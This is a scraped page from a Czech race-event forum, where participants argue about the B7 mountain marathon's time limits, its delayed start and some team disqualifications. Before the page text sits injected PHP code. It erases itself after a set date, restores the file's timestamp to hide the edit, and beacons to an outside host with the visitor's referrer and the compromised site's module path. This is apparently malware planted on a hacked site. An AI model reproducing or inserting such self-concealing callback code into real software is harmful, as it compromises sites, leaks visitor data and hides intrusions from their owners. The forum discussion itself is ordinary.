check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735874){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } PODRAZ POŘADATELŮ OHLEDNĚ ČASOVÉHO LIMITU

www.continental.cz
HLAVNÍ STRÁNKAROČNÍK 2012FOTOGALERIEDISKUSNÍ FORUME-SHOP
Vítej, Guest
Uživatelské jméno: Heslo: Zapamatovat si mne

PODRAZ POŘADATELŮ OHLEDNĚ ČASOVÉHO LIMITU
(1 přihlášený) (1) Guest
  • Strana:
  • 1
  • 2
  • 3

PŘÍSPĚVEK: PODRAZ POŘADATELŮ OHLEDNĚ ČASOVÉHO LIMITU

Re: PODRAZ POŘADATELŮ OHLEDNĚ ČASOVÉHO LIMITU před 6 roky, 10 měsíci #1640

Hele lidi, pokud si nikdo z vás nevšimnul, co tady fňukáte, tak to je závod. Pokud jste se šli jenom projít s tím, že se budete válet na každém kopci v trávě, tak jste nemuseli platit startovné a jít, kdykoliv jindy bez zázemí, občerstvení, značení, první pomoci a tak dále. Šel jsem to potrvé. Mám 100 kilo živé váhy a zvládnul jsem to pod 20 hodin. A to jsem zakufroval a špunt na Travném jsem taky zažil.
Tak se hýbejte, neobčerstvujte se hodiny a jdětě. Vidět cíl fakt stojí za to
The topic has been locked.

Re: PODRAZ POŘADATELŮ OHLEDNĚ ČASOVÉHO LIMITU před 6 roky, 9 měsíci #1721

Pro Libora:
o 18 hodinách kontrolorů na Javorníku jste věděli před závodem a určitě nebyl problém tuto kontrolu a kontrolu na Černé hoře vystřídat. A máte také pravdu, že z Javorníku neodešli dřív. Pořadatelské selhání totiž spočívá v tom, že všechny časové brány nebyly posunuty o 37 minut. Zkrácení 30hod limitu se snažíte omluvit prodloužením cíle o 15 min. I kdybyste prodloužením o 37 minut dodrželi 30 hod limit, tak by nám to na Javorníku ve 3:10 bylo prd platné, protože bychom se o tom nedozvěděli. Byl takový problém, aby nás o posunutí cílové časové brány informovala kontrola na Černé hoře?
A k 37minutovému posunutí samotného startu si ještě připočtěte dobu, za kterou jsme se v chumlu, nerozděleném na Sport a Hobby, došourali ke startovní slavobráně a dobu, po kterou jsme byli brzděni Lopraisem. Vy a Vámi tolerovaní jedinci mohli navíc volit optimální trasu ve stoupání první sjezdovky, ve kterém jsem si připadal jako uprostřed hemžení ve vodě po potopení Titaniku ve slavném filmu.
A nevhodnost výrazu „podraz“ jsem uznal v odpovědi Filipovi 3 dny před Vaším dehonestačním příspěvkovým výkřikem. K hybnosti našich „prdelí“ jen tolik: startovali jsme v kategorii Sport, protože parťák nesplňuje podmínku pro Hobby. Na každém vrcholu jsme se zdrželi do 5 minut a na občerstvovačkách do 15ti. Pili jsme pouze ionťáky a jediné pivo jsme si dali na Javorovém po zjištění, že časové brány o to zpoždění startu neprodlužujete. I přesto, že mi pohyb po horách problém nikdy nedělal, tak jsem to parťákovi na B7 pokazil. I přes speciální přípravu na B7 od června do srpna, kdy jsem v 7 dnech nachodil přes 200 km na nejrůznějších pochodech. S blížícím se cílem se mi krok zkracoval, ale bolest potlačující prášky jsem si nevzal. Možná i díky takto nevyřazené pojistce jsem, na rozdíl od Vašeho parťáka, dvakrát ustál špatné došlápnutí a do Frenštátu došel. Největší strach jsem ale měl z nevyspání, protože před mnoha lety při mém prvním 100 km pochodu jsem se musel ve tři ráno prospat. Na B7 jsem vzal kofeinovou tabletu až poté, když jsem na asfaltce kolem Kyčery uprostřed lesa uviděl dům, který tam nebyl.
I přesto, že ve 3:10 jsem si na Javorníku řekl, že B7 už nikdy, tak přihlášení na 4. B7 dnes nevylučuji. Problém ale vidím v tom, že nestárneme stejně rychle a těžko říct, co bude za rok. S rozšířením počtu kategorií neuvažujete? Nedala by se utvořit kategorie nad 65 let?
Na závěr se nemohu nevyjádřit k diskvalifikaci týmů 99 a 414: pravidla závodu určují výsledný čas jako rozdíl mezi kobercem v cíli a na startu. Tím bylo pořadí jednoznačně dáno. Kdokoliv z účastníků mohl po odměření času zajít do hospody, nebo se prospat a na dřevěnou K2 vystoupit před koncem limitu a pravidla závodu by neporušil. Pokud jedna z této dvojice netáhla druhou část trasy na gumě, nebo jednoho z pomalejší dvojice nepodpírala, tak jste ve velkém průseru, neboť vzájemnou morální podporu družstev jste v pravidlech nezakázali. Vaše hrubá chyba má podobu příkazu časoměřičům, aby upravili jejich oficiální změřený čas. Všechna ostatní upozornění na porušení pravidla stejných podmínek pro všechny, například toho z příspěvku 1661 (neprojití druhého člena cílem) nebo těch mých, jsou oproti tomu prkotiny. Tato manipulace s výsledky by mohla být důvodem k vyřazení B7 z okruhu závodů Mistrovství ČR v horském maratonu.

Re: PODRAZ POŘADATELŮ OHLEDNĚ ČASOVÉHO LIMITU před 6 roky, 9 měsíci #1723

Nedalo mě to abych na tento článek odpověděl.Všichni jsme byli informováni o jaký závod se jedná,že to není procházka růžovým sadem,dostali jsme i co si máme vzít sebou.Nerozhodoval start ,ale celá délka .kdo na to měl tak byl rychlí i na sjezdovku.Loňský rok na Velký Javorník byl také náročný.Trasa podle mě byla dobře označena-neměli jsme žádný problém.V mapě kterou jsme dostali bylo vše nakresleno.navíc byla mapa i se stoupáním a klesáním.kdo se na to připravoval tak věděl co ho čeká.Po závodě je každý chytrej,zajímalo by mě zda by velcí kritikové dokázali něco takového zorganizovat.Celému štábu organizátorů B7 patří dík za veškerou práci kterou s tím měli-nejenom vyřizování dokladů,dopravy a pod.Jinak mě je více jak 60 a došel-nejsem sportovec,ale šel jsem to že to chci dojít a také jsme to došli.Příště lépe čtete a přihlašte se na lehčí závody a nebo nějaké zorganizujte a pak uvidíme.Milan

Re: PODRAZ POŘADATELŮ OHLEDNĚ ČASOVÉHO LIMITU před 6 roky, 8 měsíci #1739

Plně souhlasím s Liborem, méně blábolit a více mákat !!!
  • Strana:
  • 1
  • 2
  • 3
Time to create page: 0.69 seconds

GENERÁLNÍ PARTNEŘI

adidas

1511

PARTNEŘI

IBS    
Frenštát pod Radhoštěm